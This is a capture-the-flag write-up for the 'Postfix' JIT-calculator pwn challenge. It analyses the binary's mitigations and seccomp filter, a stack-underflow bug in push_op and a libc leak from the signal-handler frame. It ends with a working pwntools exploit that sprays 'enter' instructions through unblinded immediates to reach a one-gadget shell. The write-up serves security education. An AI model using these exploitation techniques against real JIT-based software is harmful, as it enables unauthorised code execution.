Postfix

4 files available

ld-linux-x86-64.so.2, libc.so.6, postfix_jit, vm.tar.gz

Description

Maths is hard so I made this super-fast JIT-powered calculator. You can even define functions! It has many security features, I bet it's super safe!

Note: A VM is provided to help you replicate the remote setup. Keep in mind that this is NOT a kernel/microarch pwn!

Analysis

Checksec

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

As can be seen, the binary has all the common mitigations enabled.

Seccomp

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0001: 0x25 0x00 0x01 0x00006000  if (A <= 0x6000) goto 0003
 0002: 0x25 0x00 0x01 0x00007000  if (A <= 0x7000) goto 0004
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0004: 0x06 0x00 0x00 0x00000000  return KILL

A simple seccomp filter is also present: it forbids syscalls issued from instruction pointers roughly in the range 0x600000000000 - 0x700000000000.
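
The decision made by the four BPF instructions can be replayed in a few lines of Python. This is only a sketch of the dump above: the function name seccomp_verdict is hypothetical, and the comparisons are copied literally from the listing, which is why the exact boundaries differ slightly from the rounded range quoted in the text.

```python
def seccomp_verdict(instruction_pointer: int) -> str:
    """Replay the BPF dump for a 64-bit instruction pointer (illustrative only)."""
    # 0000: A = instruction_pointer >> 32 (the filter only sees the high half)
    a = (instruction_pointer >> 32) & 0xFFFFFFFF
    # 0001: if (A <= 0x6000) goto 0003 -> ALLOW
    if a <= 0x6000:
        return "ALLOW"
    # 0002: if (A <= 0x7000) goto 0004 -> KILL
    if a <= 0x7000:
        return "KILL"
    # 0003: anything above the window is allowed again
    return "ALLOW"


if __name__ == "__main__":
    # Example addresses are made up for illustration.
    for ip in (0x555555554000, 0x650000001000, 0x7FFFF7A00000):
        print(hex(ip), seccomp_verdict(ip))
```

Under this model, a syscall instruction executed from inside the JIT region is killed, while the same syscall reached through libc is allowed.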

Reversing

The binary lets you define functions of up to one variable in postfix notation. After being parsed, the functions are JIT-compiled into native x86-64 code. They can then be called, optionally providing a value for the variable.

Most of the logic happens during the parsing and compilation of the postfix expression. This starts with the parse(expr_stack_t *out_stack, char *input, char **parsed) function: the string is split into tokens, which then get pushed onto an expr_stack_t structure as a pair of value and type.

When an operator is pushed (through the push_op function) it gets optimized away if the two previous tokens are constants, since the result can be computed at parse-time as it does not depend on other operations or variables.
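
The folding step can be illustrated with a minimal Python sketch. It shows the intended behaviour (fold only when both operands are constants), not the binary's actual push_op: the names OPS, push_token and fold are hypothetical, and division is left out to keep the example short.

```python
import operator

# Operators handled by this sketch; division is omitted on purpose.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}


def push_token(stack, token):
    """Push one token, folding the operator when both operands are constants."""
    if token in OPS:
        both_constant = (
            len(stack) >= 2
            and isinstance(stack[-1], int)
            and isinstance(stack[-2], int)
        )
        if both_constant:
            rhs = stack.pop()
            lhs = stack.pop()
            stack.append(OPS[token](lhs, rhs))  # computed at parse time
        else:
            stack.append(token)  # left for the JIT to emit
    elif token == "x":
        stack.append("x")  # the single variable
    else:
        stack.append(int(token))  # a constant


def fold(expr):
    """Return the token stack left after parsing a postfix expression."""
    stack = []
    for token in expr.split():
        push_token(stack, token)
    return stack


if __name__ == "__main__":
    print(fold("2 3 + x *"))
```

In this example the addition disappears at parse time, while the multiplication survives because one of its operands is the variable.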

The expr_stack_t is then passed to jit_expr, which does the actual translation to x86 code. A prologue which zeroes all registers and migrates to a separate stack (jit_stk) is generated and it looks like this:

xor eax, eax ; zero all registers except rdi and rsp
xor ebx, ebx
...
wrgsbase rsp ; save rsp for later
mov rsp, jit_stk ; migrate to jit_stk
call actual_jit_code ; call jit code
rdgsbase rsp ; restore rsp
ret
actual_jit_code:
...

The stack is then iterated:

known values become push operations through the opt_push function, which emits different instructions depending on the size of the value
variables become push rdi instructions (as the variable is passed through rdi)
operators are translated roughly to pop rbx; pop rax; add/sub/imul/idiv ...; push rax
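
The three rules above can be sketched as a small translator that emits assembly text. This is an illustration only: the function name translate, the ARITH table and the exact operand forms are assumptions, and a real opt_push would pick different encodings depending on the size of the constant.

```python
# Assumed instruction text for each operator; the writeup only says "roughly".
ARITH = {
    "+": "add rax, rbx",
    "-": "sub rax, rbx",
    "*": "imul rax, rbx",
    "/": "cqo; idiv rbx",
}


def translate(tokens):
    """Turn a parsed token list (ints, "x", operators) into assembly lines."""
    asm = []
    for tok in tokens:
        if isinstance(tok, int):
            asm.append(f"push {tok:#x}")  # known value
        elif tok == "x":
            asm.append("push rdi")  # the variable lives in rdi
        else:
            # operator: pop both operands, compute, push the result
            asm += ["pop rbx", "pop rax", ARITH[tok], "push rax"]
    asm.append("pop rax")  # final result returned in rax
    return asm


if __name__ == "__main__":
    print("\n".join(translate([5, "x", "*"])))
```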

The opt_push function also applies constant blinding when a 32-bit or 64-bit constant is pushed, as a mitigation against JIT spraying. Instead of the actual value val, the generated code embeds val ^ rnd, where rnd is a random value generated by the function. An xor operation is then emitted to decrypt the constant at runtime before pushing it onto the stack. The generated code might look like this:

; opt_push(0xAAAAAAAA)

mov rax, 0xB00CE592  ; = 0xAAAAAAAA ^ 0x1AA64F38
xor rax, 0x1AA64F38      
push rax             ; = 0xAAAAAAAA
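
The arithmetic behind the blinding can be checked with a short Python sketch. The helper names blind and unblind are hypothetical, and drawing rnd from the secrets module is an assumption made for the example; the writeup does not say how the binary generates its random value.

```python
import secrets


def blind(val, bits=32):
    """Return (blinded, rnd) such that blinded ^ rnd == val (within `bits`)."""
    mask = (1 << bits) - 1
    rnd = secrets.randbits(bits)  # assumed randomness source
    return (val & mask) ^ rnd, rnd


def unblind(blinded, rnd):
    """What the emitted xor does at runtime."""
    return blinded ^ rnd


if __name__ == "__main__":
    blinded, rnd = blind(0xAAAAAAAA)
    print(hex(blinded), hex(rnd), hex(unblind(blinded, rnd)))
```

Because neither immediate in the emitted code is chosen by the attacker, a blinded constant cannot be used to smuggle instruction bytes into the JIT page.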

The final result is then popped through pop rax.

As a final note, the JIT code pages are allocated through jit_init at random offsets in the region 0x600000000000-0x700000000000, which is the same range forbidden by the seccomp filter. The JIT stack is allocated by jit_stk_init at a random offset in the region 0x300000000000-0x400000000000.

Vulnerabilities

Relative RIP control inside the JIT code

The main vulnerability is in the push_op function: it should require two numbers on the stack to apply the operator, but the only check is that the stack contains at least two elements, which might not both be numbers. This allows an attacker to cause a stack underflow, which, combined with the JIT operations, makes it possible to add arbitrary offsets to the return address of the JIT prologue.

An example might be 0 x + + 0, which will add x to the return address. The final constant is required because the code inside parse keeps a variable named count, which tracks the number of elements on the stack at runtime and is checked at the end of the function. If this value is different from 1 (which should be the element returned by the function), the parse function will fail.
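
To see why such an expression is accepted, here is a small Python model of the bookkeeping described above. It is a sketch, not the binary's code: model_parse and OPERATORS are hypothetical names, the list stands in for expr_stack_t, and count is assumed to go up by one for every value and down by one for every operator.

```python
OPERATORS = {"+", "-", "*", "/"}


def model_parse(expr):
    """Return (accepted, underflow_slots) for a postfix expression."""
    stack = []   # token stack: holds values AND unfolded operators
    count = 0    # modelled depth of the JIT stack at runtime
    lowest = 0   # deepest slot touched relative to the stack base
    for tok in expr.split():
        if tok in OPERATORS:
            if len(stack) < 2:  # the only check described in the writeup
                return False, 0
            folded = isinstance(stack[-1], int) and isinstance(stack[-2], int)
            if folded:
                # two constants collapse into one; the value is irrelevant here
                stack[-2:] = [0]
            else:
                stack.append(tok)
                # at runtime the operator pops two slots starting at depth count
                lowest = min(lowest, count - 2)
            count -= 1
        else:
            try:
                stack.append(int(tok))
            except ValueError:
                stack.append(tok)  # the variable
            count += 1
    return count == 1, -lowest


if __name__ == "__main__":
    print(model_parse("0 x + + 0"))
```

In this model the second + finds three tokens on the token stack, so the check passes, yet only one value is left on the runtime stack: the operator therefore also consumes the slot just past the stack base, which is where the prologue's return address lives.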

Information leak through the signal handler stack frame

When a division by zero occurs during JIT execution, a SIGFPE signal is raised and a registered signal handler is called. The handler exits gracefully from the JIT area (through a siglongjmp) and informs the user that an error occurred, without crashing the program. Since the handler isn't registered with the SA_ONSTACK flag, when it is invoked during JIT execution it simply runs on the JIT stack, spilling its stack frame onto it. This can be used to leak various information, such as a libc address. Keep in mind that the signal handler stack frame has a variable size: it depends on the size of the XSAVE area, which in turn depends on the enabled CPU features (which is why the challenge was run under QEMU). This is not a problem in practice, since the binary prints CPUID information at startup, including the maximum and actual size of this area.

Exploitation

We can first trigger the leak with a division by zero. To get the leak as close as possible, we can abuse the stack underflow caused by the wrong check in push_op. A payload such as 0 x * * * * / 0 0 0 0 should do the trick. We can play with the number of * and 0 tokens (which must be equal anyway, to satisfy the count == 1 constraint) to lower the signal handler stack frame.
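
Such a payload can be generated for any number of repetitions with a small helper. The name build_trigger is hypothetical; the choice of xsave_size // 8 - 7 repetitions shown in the usage line is the one used by the exploit script at the end of this writeup.

```python
def build_trigger(repeats):
    """Build '0 x', `repeats` multiplications, a division, then `repeats` zeros."""
    tokens = ["0", "x"]
    tokens += ["*"] * repeats  # each '*' moves the runtime stack pointer up
    tokens.append("/")         # divides by zero when x is 0
    tokens += ["0"] * repeats  # restores count == 1 so parse accepts it
    return " ".join(tokens)


if __name__ == "__main__":
    xsave_size = 0x340  # example value only; the real one is printed by the binary
    print(build_trigger(xsave_size // 8 - 7))
```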

Since we can't really pop values from the stack arbitrarily, we have to abuse the relative RIP control to move the stack pointer near a libc leak. We can then add a relative offset to this leak to turn it into a one-gadget, which gives us a shell when the code returns. To do this we abuse the fact that 8-bit and 16-bit values are not blinded, which lets us encode instructions inside push immediates. Furthermore, 16-bit values are still emitted with a 32-bit push instruction, causing them to be sign-extended to four bytes. I found the enter instruction to be particularly useful, since it lets us move the stack pointer, and we can encode it by pushing 0xXXC8, where XX is the number of bytes to subtract from the stack pointer. As long as XX is less than 0x7F, the sign bit is clear, so the upper bytes are zero and the immediate decodes as an enter XX, 0 instruction, which decrements the stack pointer by XX (in addition to the 8 bytes taken by its implicit push rbp).
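
The byte-level trick can be verified with a few lines of Python. This sketch assumes the JIT emits the standard push imm32 encoding (opcode 0x68 followed by a little-endian 32-bit immediate) for 16-bit constants; the helper names push_imm32 and enter_gadget_value are hypothetical.

```python
import struct


def push_imm32(value):
    """Encode `push imm32`: opcode 0x68 plus a little-endian signed immediate."""
    return b"\x68" + struct.pack("<i", value)


def enter_gadget_value(stack_bytes):
    """Constant whose push immediate decodes as `enter stack_bytes, 0`."""
    if not 0 <= stack_bytes < 0x7F:  # bound taken from the writeup
        raise ValueError("stack_bytes must be below 0x7F")
    return (stack_bytes << 8) | 0xC8  # 0xC8 is the enter opcode


if __name__ == "__main__":
    code = push_imm32(enter_gadget_value(0x60))
    print(code.hex())      # bytes of the push as emitted
    print(code[1:].hex())  # same bytes seen from one byte later: enter 0x60, 0
```

Skipping the 0x68 opcode byte leaves exactly C8 60 00 00, that is the enter opcode, a 16-bit frame size of 0x60 and a nesting level of 0, so execution falls through cleanly into whatever the JIT emitted next.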

Using this we can reach a libc address and change it to a one-gadget. We can then push one value (the JIT will need to pop a return value) and at the ret instruction we'll get a shell. A payload for this might be x 0 * x - {rsp_offset << 8 | 0xc8} - {SPRAYED_INSN_OFFSET} + + {rsp_offset << 8 | 0xc8} x + + 0, where x is the value to be added to the libc pointer.
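
The template above can be filled in programmatically. This is a minimal sketch: build_payload is a hypothetical helper, and the values 0x60 and 49 in the usage line are the ones used by the exploit script below.

```python
def build_payload(rsp_offset, sprayed_insn_offset):
    """Fill the payload template with the enter immediate and the code offset."""
    enter_imm = (rsp_offset << 8) | 0xC8  # decodes as enter rsp_offset, 0
    return (
        f"x 0 * x - {enter_imm} - {sprayed_insn_offset} + + "
        f"{enter_imm} x + + 0"
    )


if __name__ == "__main__":
    print(build_payload(0x60, 49))
```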

Exploit

#!/usr/bin/env python3

from pwn import *

HOST = args.HOST if args.HOST else "localhost"
PORT = int(args.PORT) if args.PORT else 1337

def conn():
    r = remote(HOST, PORT)
    return r

def create_func(func_id, expr):
    r.sendafter(b"> ", b"c\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b">>> ", expr.encode() + b"\n")

def execute_func(func_id, arg, get_res=False):
    r.sendafter(b"> ", b"x\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b": ", arg.encode() + b"\n")
    if get_res:
        r.recvuntil(b"result: ")
        return int(r.recvline().decode().strip())

def main():
    global r
    r = conn()

    r.recvuntil(b"supported features: " + context.newline)
    r.recvlines(4)
    xsave_size = int(r.recvline().split(b" ")[1], 16)
    log.info(f"xsave_max_size: {hex(xsave_size)}")

    # 0xebcf8 execve("/bin/sh", rsi, rdx)
    # constraints:
    #     address rbp-0x78 is writable
    #     [rsi] == NULL || rsi == NULL
    #     [rdx] == NULL || rdx == NULL

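    # Offset added to the prologue's return address so that execution lands
    # inside the push immediate (SPRAYED_INSN_OFFSET in the payload template).
    CODE_OFFSET = 49

    # Underflow the JIT stack with '*' operators, then divide by zero;
    # the trailing zeros bring count back to 1 so that parse accepts it.
    trigger_sighandler = "0 x " + ("* " * (xsave_size//8 - 7)) + "/ " + ("0 " * (xsave_size//8 - 7))
    # 0x60c8 is the constant whose push immediate decodes as enter 0x60, 0.
    payload = f"x 0 * x - {0x60c8} - {CODE_OFFSET} + + {0x60c8} x + + 0"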

    create_func("DIV0", trigger_sighandler)
    execute_func("DIV0", "0")

    # <__execvpe+1144>:	lea    rdi,[rip+0xec999]
    one_gadget_addr = 0xebcf8
    log.info(f"one_gadget_addr: {hex(one_gadget_addr)}")

    # <_IO_2_1_stdin_+131>:	0x00000000
    sighandler_leak_addr = 0x219b23
    log.info(f"sighandler_leak_addr: {hex(sighandler_leak_addr)}")

    offset = sighandler_leak_addr - one_gadget_addr
    log.info(f"offset: {hex(offset)}")

    create_func("PWN", payload)
    execute_func("PWN", str(-offset))

    r.sendline(b"cat flag.txt")
    log.info(r.recvregex(b"snakeCTF{.*}", timeout=5).strip().split(context.newline)[-1].decode())
    r.close()

if __name__ == "__main__":
    main()